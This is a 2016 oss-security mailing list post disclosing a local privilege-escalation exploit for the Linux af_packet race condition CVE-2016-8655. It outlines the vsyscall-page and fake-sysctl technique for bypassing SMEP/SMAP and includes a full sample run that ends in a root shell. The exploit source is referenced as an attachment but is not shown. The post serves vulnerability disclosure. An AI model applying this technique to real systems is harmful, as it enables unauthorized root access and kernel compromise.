Date: Wed, 7 Dec 2016 15:03:29 +0900 From: Philip Pettersson <philip.pettersson@...il.com> To: oss-security@...ts.openwall.com Subject: Re: CVE-2016-8655 Linux af_packet.c race condition (local root) Attached is a sample exploit for Ubuntu 16.04 x86_64 and some 14.04 kernels, but the same method should work for any distro with unprivileged user namespace support. I only tested it on 4.4 so there's a high risk of kernel panic if you run it on anything but 4.4. It defeats SMEP/SMAP by calling set_memory_rw() on the vsyscall page, setting up a fake struct ctl_table in that area and finally calling register_sysctl_table() to register a world-writable sysctl entry for modprobe. Since the instruction pointer is hijacked in interrupt context you have to do this even on non-SMEP/SMAP systems, so the bypass is more of a by-product. If you want to execute arbitrary kernel shellcode you can also do: 1. set_memory_rw() on vsyscall page 2. (userland) write shellcode to vsyscall page 3. set_memory_x() on vsyscall page 4. jump to vsyscall page (However, that requires winning the race three times instead of two.) You can also run it with "crash" as the first argument to force a panic. =*=*=*=*=*=*=*=*= SAMPLE OUTPUT =*=*=*=*=*=*=*=*= user@...ntu:~$ uname -a Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux user@...ntu:~$ id uid=1000(user) gid=1000(user) groups=1000(user) user@...ntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread user@...ntu:~$ ./chocobo_root linux AF_PACKET race condition exploit by rebel kernel version: 4.4.0-51-generic #72 proc_dostring = 0xffffffff81088090 modprobe_path = 0xffffffff81e48f80 register_sysctl_table = 0xffffffff812879a0 set_memory_rw = 0xffffffff8106f320 exploit starting making vsyscall page writable.. new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 174222, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 *=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=* please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... vsyscall page altered! stage 1 completed registering new sysctl.. new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 133577, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 *=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=* please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... sysctl added! stage 2 completed binary executed by kernel, launching rootshell root@...ntu:~# id uid=0(root) gid=0(root) groups=0(root),1000(user) View attachment "chocobo_root.c" of type "text/x-csrc" (20105 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.